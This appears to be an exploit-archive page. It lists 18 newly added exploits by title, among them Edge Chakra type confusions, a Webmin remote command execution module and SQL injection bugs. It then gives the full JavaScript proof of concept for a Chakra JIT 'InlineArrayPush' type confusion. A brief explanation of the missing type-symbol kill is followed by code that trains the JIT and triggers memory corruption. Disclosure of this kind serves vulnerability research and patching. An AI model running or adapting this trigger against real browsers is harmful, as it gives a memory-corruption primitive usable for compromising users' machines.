40d3df51a4
18 changes to exploits/shellcodes Watchr 1.1.0.0 - Denial of Service (PoC) One Search 1.1.0.0 - Denial of Service (PoC) Eco Search 1.0.2.0 - Denial of Service (PoC) 7 Tik 1.0.1.0 - Denial of Service (PoC) VPN Browser+ 1.1.0.0 - Denial of Service (PoC) FastTube 1.0.1.0 - Denial of Service (PoC) Microsoft Edge Chakra - 'InlineArrayPush' Type Confusion Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion Microsoft Edge Chakra - 'InitClass' Type Confusion Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free Webmin 1.900 - Remote Command Execution (Metasploit) SCP Client - Multiple Vulnerabilities (SSHtranger Things) SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion phpTransformer 2016.9 - SQL Injection phpTransformer 2016.9 - Directory Traversal Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload
27 lines
No EOL
849 B
JavaScript
27 lines
No EOL
849 B
JavaScript
/*
|
|
In Chakra, if you add a numeric property to an object having inlined properties, it will start transition to a new type where the space for some of previously inlined properties become for the pointer to the property slots and the pointer to the object array which stores numeric properties. For this reason, when it optimizes an InlineArrayPush instruction which might start transition, it needs to kill corresponding type symbols to prevent type confusion. But it doesn't, so it can lead to type confusion.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
function opt(a, b) {
|
|
a.b = 2;
|
|
b.push(0);
|
|
a.a = 0x1234;
|
|
}
|
|
|
|
function main() {
|
|
Object.prototype.push = Array.prototype.push;
|
|
|
|
for (let i = 0; i < 1000; i++) {
|
|
let a = {a: 1, b: 2};
|
|
opt(a, {});
|
|
}
|
|
|
|
let o = {a: 1, b: 2};
|
|
opt(o, o);
|
|
|
|
print(o.a);
|
|
}
|
|
|
|
main(); |